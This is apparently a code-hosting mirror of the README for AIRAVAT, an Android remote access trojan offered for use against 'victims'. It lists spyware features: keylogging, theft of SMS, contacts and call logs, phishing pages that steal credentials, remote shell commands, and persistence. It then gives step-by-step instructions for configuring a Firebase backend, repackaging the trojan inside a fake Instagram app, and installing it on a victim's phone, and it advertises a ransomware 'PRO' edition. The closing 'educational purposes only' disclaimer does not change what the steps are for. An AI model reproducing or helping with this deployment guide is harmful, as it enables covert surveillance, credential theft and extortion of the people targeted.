Coder Social home page Coder Social logo

airavat's Introduction

AIRAVAT

A multifunctional Android RAT with GUI based Web Panel without port forwarding.

Features

  • Read all the files of Internal Storage
  • Download Any Media to your Device from Victims Device
  • Get all the system information of Victim Device
  • Retrieve the List of Installed Applications
  • Retrive SMS
  • Retrive Call Logs
  • Retrive Contacts
  • Send SMS
  • Gets all the Notifications
  • Keylogger
  • Admin Permission
  • Show Phishing Pages to steal credentials through notification.
    • Steal credentials through pre built phishing pages
    • Open any suspicious website through notification to steal credentials.
  • Record Audio
  • Play music in Victim's device
  • Vibrate Device
  • Text To Speech
  • Change Wallpaper
  • Run shell Commands
  • Pre Binded with Instagram Webview Phishing
  • Runs In Background
    • Auto Starts on restarting the device
    • Auto Starts when any notification arrives
  • No port forwarding needed

Requirements

How to Build

Firebase Setup

  1. Create an Firebase Account and afterwords create a new project with any name.
  2. Enable Firebase Database and Firebase Storage.
  3. In Firebase Database Click on the rules and set .read and .write to true
    •     {
           "rules": {
                   ".read": "true",
                   ".write": "true"
                    }
          }
  4. In Firebase Storage allow reads and writes for all paths.
    •   rules_version = '2';
        service firebase.storage {
        match /b/{bucket}/o {
            match /{allPaths=**} {
               allow read, write 
              }
          }
       }
  5. Now Go to project overview and create an Android App and download the google-services.json file.
  6. Also create a web app and copy the config of webapp.

Panel Setup

  1. You can use Github Pages or any Hosting Website for hosting the panel.
  2. Open index.html File and from line number 16 replace the config with your web app config which you have created on Step 6.
  3. Save the file , Your Panel Setup is completed.

Android RAT

  1. Download Instagram.apk
  2. Decompile it using any Decompiler recommend above.
  3. Now open res/values/strings.xml file.
  4. Replace values of firebase_database_url , google_api_key , google_app_id , google_storage_bucket , project_id with your Firebase Account using google-services.json file which you have downloaded on step 5
    • Example
      <string name="firebase_database_url">https://your_database_url.firebase.com</string>
      <string name="google_api_key">your_api_key</string>
      <string name="google_app_id">your_app_id</string>
      <string name="google_storage_bucket">your_storage_bucket_url</string>
      <string name="project_id">project_id</string>
  5. Now compile the code with appt2.
  6. Install the app in victim's device and give all the permissions after that the connection will show up in web panel.

PoC Video

  1. https://youtu.be/i3JAHcsWwu0 (old video)

Tutorial Videos

  1. https://youtu.be/an2BALW73j4 (SPHANTER)
  2. https://youtu.be/atSX_YDniyM (Mr.Ethical YT)

❤️Supporters❤️

Stargazers repo roster for @th30neand0nly/AIRAVAT

Forkers repo roster for @th30neand0nly/AIRAVAT

AIRAVAT PRO

  1. Read , Delete files from victim's device
  2. Encrypt any file in victim's device
  3. Capture Photo from Camera
  4. Get Sim Card Information
  5. Ransomware (encrypt all the files and show the notification demanding for ransom)
  6. Auto Start Permission for all chinese vendors.
  7. Hidden App without Foreground service notification (full stealth mode)

PoC Video

  1. https://youtu.be/wWjJjaJEVAg

Contact Info

  1. Telegram

DISCLAIMER

TO BE USED FOR EDUCATIONAL PURPOSES ONLY

The use of the AIRAVAT is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. Please read LICENSE.

airavat's People

Contributors

prateek-chaubey avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.